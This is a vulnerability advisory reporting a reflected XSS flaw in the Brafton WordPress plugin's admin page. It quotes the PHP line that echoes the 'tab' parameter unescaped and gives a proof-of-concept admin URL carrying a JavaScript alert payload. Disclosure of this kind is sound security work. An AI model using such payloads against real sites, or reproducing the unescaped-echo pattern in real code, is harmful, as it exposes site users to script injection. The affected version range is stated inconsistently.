brafton WordPress Plugin <=3.4.7 - Reflected XSS

Description

Title -brafton WordPress Plugin XSS

# Exploit Title : Vulnerabilitie XSS in brafton WordPress Plugin
# Date: Fri May 20 2016
# Reported Date : Fri May 20 2016
# Vendor Homepage: http://www.brafton.com/support/wordpress/
# Version: v3.3.10 – January2016
# Software Link: https://github.com/ContentLEAD/BraftonWordpressPlugin/archive/master.zip
# Exploit Author :MehrdadLinux
# Tested On : Linux Platforms.
# Fix/Patching : Update To
# Facebook : https://facebook.com/MehrdadLinux
# Twitter : http://twitter.com/MehrdadLinux
# Detailed Vul: http://blog.opsnit.com
===========================================================================================

1. VULNERABILITY
-------------------------

brafton WordPress Plugin v3.3.10 – January2016

2. BACKGROUND
-------------------------
this is WordPress Plugin for Brafton

Brafton is a content marketing agency.
Our in-house teams develop and execute SEO-optimized content strategies,
from news to infographics

3. DESCRIPTION
-------------------------
XSS in BraftonAdminPage.php

in line 11 :
tab = <?php if(isset($_GET['tab'])){ echo $_GET['tab'];} else{ echo 0;}?>;

wordpress/wp-admin/admin.php?page=BraftonArticleLoader&tab=alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83))

4. discovered by :
-------------------------

The vulnerability has been discovered by Mehrdad Abbasi(MehrdadLinux) and Hossein Masoudi (cs.masoudi)
email : MehrdadLinux (at) gmail (dot) com
http://opsnit.com

5 .LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.